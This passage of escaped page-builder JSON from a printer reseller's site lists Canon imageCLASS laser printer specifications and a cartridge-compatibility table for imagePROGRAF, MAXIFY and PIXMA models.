(A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment 